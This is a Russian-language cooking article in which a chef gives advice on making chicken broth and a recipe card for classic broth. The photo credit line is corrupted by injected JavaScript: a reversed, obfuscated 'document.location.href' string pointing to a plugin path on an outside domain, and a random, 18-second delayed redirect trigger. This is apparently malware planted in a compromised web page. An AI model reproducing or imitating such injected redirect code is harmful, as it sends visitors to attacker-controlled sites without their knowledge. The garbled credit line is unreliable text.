Как правильно сварить куриный бульон: инструкция от шеф-повара

Идеальный куриный бульон приготовить совсем не сложно. Важно выбрать хорошую курицу и варить, сколько нужно. Секретами вкусного бульона делится Никита Мальцев, шеф-повар «Дома культур».

Как правильно сварить куриный бульон: инструкция от шеф-повара. Изображение номер 1

На фото: Никита Мальцев

Из чего лучше варить бульон

— Лучший бульон готовится из целых кур, которые росли на свободном выгуле и питались в естественной среде. Из бройлерных кур вкусный бульон не получится.

На три литра супа понадобится одна курица. Ещё хороший бульон получается из одних куриных лапок.

Куриный бульон рекомендуют врачи и диетологи. Куриное мясо считается диетическим, и бульон из него тоже. Бульон сбалансирован по питательным элементам: он содержит белок, жиры, углеводы, витамины группы B.

Что добавить

Добавьте в бульон немного кокосового или оливкового масла для вкуса и аромата. Ещё хороши овощи и специи: фенхель, стебель сельдерея, лук-порей, морковь, грибы, лавровый лист, белый перец, душистый перец, стебли петрушки или кориандра.

Овощи помогают сделать бульон прозрачным.

Как правильно сварить куриный бульон: инструкция от шеф-повара. Изображение номер 2

Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com

Сколько варить

Варить курицу следует 3-4 часа. Сначала доведите до кипения и снимите пену, затем поставьте на слабый огонь на 3 часа. Варите с закрытой крышкой.

После того как бульон будет готов, выньте курицу и перелейте бульон в другую ёмкость.

Как хранить

Бульон можно перелить в вакуумные пакеты и хранить в морозилке в течение двух недель. В холодильнике храните бульон в кастрюле около трёх-четырёх суток.

40 calories

Классический куриный бульон

Его можно не только съесть с гренками, но и превратить в основу для супа, соуса или гарнира.

Изображение рецепта Классический куриный бульон

Классический куриный бульон

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

180 минут

PT3H

PT3H

КОЛИЧЕСТВО ПОРЦИЙ:

8 порций

КАЛОРИЙНОСТЬ:

40 ккал

Сложность

Время

180 минут

Кол-во порций

8 порций

Калорийность

40 ккал

Ингредиенты

Курица (целая)

1 шт.

Вода

3 л

Лук (репчатый)

1 шт.

Морковь

1 шт.

Соль

1 щепотка

Перец

1 щепотка

Процесс приготовления

  1. Вымойте курицу и положите её в глубокую кастрюлю.
  2. Налейте воду так, чтобы она полностью покрывала курицу. Добавьте соль.
  3. Морковь и лук вымойте и очистите. Морковь нарежьте на несколько частей, лук оставьте целым или разрежьте пополам.
  4. Поставьте кастрюлю на медленный огонь.
  5. Через 1,5 часа добавьте в бульон морковь, лук и перец.
  6. Варите ещё 1,5 часа.
  7. Выньте все ингредиенты из готового бульона и процедите его через марлю.
  8. Варёную курицу и овощи можно использовать в других блюдах.

Статьи по теме

Рецепт дня: суп с лапшой, курицей и яйцом

Самый полный гид по лапше: что нужно знать и что из неё приготовить

Рецепт дня: тёплый салат с курицей и баклажанами

6 самых полезных видов салата

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector